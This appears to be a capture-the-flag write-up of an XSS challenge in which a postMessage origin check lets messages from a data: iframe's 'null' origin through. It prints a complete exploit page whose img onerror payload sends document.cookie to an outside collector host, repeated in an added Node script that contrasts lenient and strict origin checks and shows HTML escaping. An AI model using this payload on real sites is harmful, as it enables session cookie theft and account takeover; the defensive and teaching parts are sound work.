Tags: web xss 

There is a bug in the origin-validation function: messages sent from a null origin pass the check. A page loaded from a `data:` URL has the opaque origin, which `MessageEvent.origin` reports as the string `"null"`, so the exploit page below opens `call.php` from a `data:` iframe and posts a crafted call message. The `sender_username` field carries an `<img onerror>` payload that runs in the context of `call.php` and sends `document.cookie` to the attacker's endpoint.
```html
<html>
<body>
<!-- The payload runs inside a data: iframe, whose origin is "null"; the origin
     check on the call page lets it through, so the postMessage below is accepted.
     The 1000 ms delay gives call.php time to load before the message is posted.
     Inner double quotes are written as &quot; so they do not terminate the src
     attribute; the browser decodes them before running the data: document. -->
<iframe src="data:text/html,<script>var call_window = window.open('http://localhost/call.php');setTimeout(function(){
call_window.postMessage({
type: 'audio',
details: {
sender_username: &quot;<img src=xx: onerror=window.open('https://hookb.in/ZdNNDQ6X?a='+document.cookie)>&quot;,
sender_team_name: 'zzzz',
receiver_username: 'test',
receiver_team_name: 'test'
}
}, '*');}, 1000);</script>"></iframe>
</body>
</html>
```
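As an added example (not part of the original writeup and not the challenge's code), the script below contrasts a lenient origin check that lets the opaque origin `"null"` through with a strict allow-list check, and shows the output escaping that would neutralise the `sender_username` payload. The allow-list, `originAllowedLenient`, `originAllowedStrict`, `escapeHtml` and `handleCallMessage` are assumptions made for illustration; the real check in `call.php` is not reproduced here. The sample message is constructed to match the exploit page above, and the script runs under Node without a browser.

```javascript
// Added example: strict vs. lenient postMessage origin checks (names are assumptions).
const ALLOWED_ORIGINS = new Set(['http://localhost']);

// Hypothetical lenient check: an origin that does not parse as a URL (the opaque
// origin "null" is one) is treated as "not a web origin" and the check is skipped.
// This is one way the bypass described above can arise; it is not the challenge's code.
function originAllowedLenient(origin) {
  let url;
  try {
    url = new URL(origin);
  } catch (e) {
    return true; // opaque or unparsable origin: check skipped (the bug)
  }
  return ALLOWED_ORIGINS.has(url.origin);
}

// Strict check: exact match against the allow-list. "null", "", undefined and any
// other unexpected value are rejected.
function originAllowedStrict(origin) {
  return typeof origin === 'string' && ALLOWED_ORIGINS.has(origin);
}

// Minimal HTML escaping for untrusted strings rendered into the call UI.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Message handler in the shape a call page might register; it takes a plain object so it
// runs outside a browser (in the page it would be window.addEventListener('message', ...)).
function handleCallMessage(event, checkOrigin) {
  if (!checkOrigin(event.origin)) {
    return { accepted: false, reason: 'untrusted origin ' + String(event.origin) };
  }
  const d = event.data;
  if (!d || d.type !== 'audio' || !d.details || typeof d.details.sender_username !== 'string') {
    return { accepted: false, reason: 'malformed message' };
  }
  return {
    accepted: true,
    html: '<div class="caller">' + escapeHtml(d.details.sender_username) + '</div>',
  };
}

// Constructed sample: the message the exploit page sends. A data: iframe has the opaque
// origin, which MessageEvent.origin reports as the string "null".
const exploitEvent = {
  origin: 'null',
  data: {
    type: 'audio',
    details: {
      sender_username: "<img src=xx: onerror=window.open('https://hookb.in/ZdNNDQ6X?a='+document.cookie)>",
      sender_team_name: 'zzzz',
      receiver_username: 'test',
      receiver_team_name: 'test',
    },
  },
};

const lenient = handleCallMessage(exploitEvent, originAllowedLenient);
const strict = handleCallMessage(exploitEvent, originAllowedStrict);
console.log('lenient check accepted the null-origin message:', lenient.accepted);
console.log('strict check accepted the null-origin message:', strict.accepted);
if (lenient.accepted) console.log('rendered with escaping:', lenient.html);
```

Even where the origin check is fixed, the handler should still escape `sender_username` before rendering it: the origin check decides who may send a call, the escaping decides what a legitimate but compromised sender can do with the field.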